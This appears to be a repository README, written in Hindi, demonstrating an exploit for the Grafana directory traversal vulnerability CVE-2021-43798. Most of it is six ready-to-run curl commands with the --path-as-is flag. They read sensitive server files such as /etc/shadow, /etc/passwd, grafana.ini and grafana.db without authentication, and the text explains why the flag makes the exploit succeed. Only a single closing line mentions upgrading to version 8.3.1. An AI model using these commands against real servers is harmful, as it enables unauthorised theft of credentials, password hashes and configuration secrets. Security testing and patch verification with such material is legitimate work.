
CVE-2021-43798 के लिए शोषण, एक Grafana निर्देशिका ट्रैवर्सल भेद्यता, जो तैयार किए गए curl कमांड के माध्यम से अप्रमाणित मनमाना फ़ाइल पढ़ने में सक्षम बनाता है।
यह रिपॉजिटरी CVE-2021-43798 के शोषण को प्रदर्शित करता है, जो Grafana में एक निर्देशिका ट्रैवर्सल भेद्यता है। यह भेद्यता हमलावरों को सर्वर पर मनमानी फ़ाइलें पढ़ने की अनुमति देती है।
भेद्यता का मैन्युअल रूप से शोषण करने के लिए, आप संवेदनशील फ़ाइलों को पढ़ने का प्रयास करने के लिए निम्नलिखित curl कमांड में से किसी एक का उपयोग कर सकते हैं:
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../Users/install.txt"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/passwd"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/grafana/grafana.ini"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../var/lib/grafana/grafana.db"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/hostname"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/shadow"
Grafana CVE-2021-43798 निर्देशिका ट्रैवर्सल भेद्यता के शोषण के संदर्भ में, --path-as-is विकल्प आवश्यक है क्योंकि यह विशेष रूप से तैयार किए गए ट्रैवर्सल अनुक्रमों (../../../../../) को बिना संशोधन के सीधे सर्वर पर भेजने की अनुमति देता है। इससे इच्छित निर्देशिका के बाहर सर्वर पर संवेदनशील फ़ाइलों तक पहुंच हो सकती है।
--path-as-is के बिना, curl पथ को /public/plugins/Users/install.txt जैसी किसी चीज़ में सामान्यीकृत कर सकता है, जो भेद्यता का शोषण नहीं करेगा। --path-as-is का उपयोग करके, सटीक ट्रैवर्सल अनुक्रम संरक्षित रहता है, जिससे शोषण सफल हो जाता है।
आप curl दस्तावेज़ीकरण में --path-as-is विकल्प के बारे में अधिक विवरण प्राप्त कर सकते हैं। --path-as-is को समझकर और उपयोग करके, सुरक्षा पेशेवर और शोधकर्ता वेब अनुप्रयोगों में निर्देशिका ट्रैवर्सल भेद्यताओं का प्रभावी ढंग से प्रदर्शन और परीक्षण कर सकते हैं।
इस भेद्यता को कम करने के लिए, Grafana को संस्करण 8.3.1 या बाद के संस्करण में अपग्रेड करें।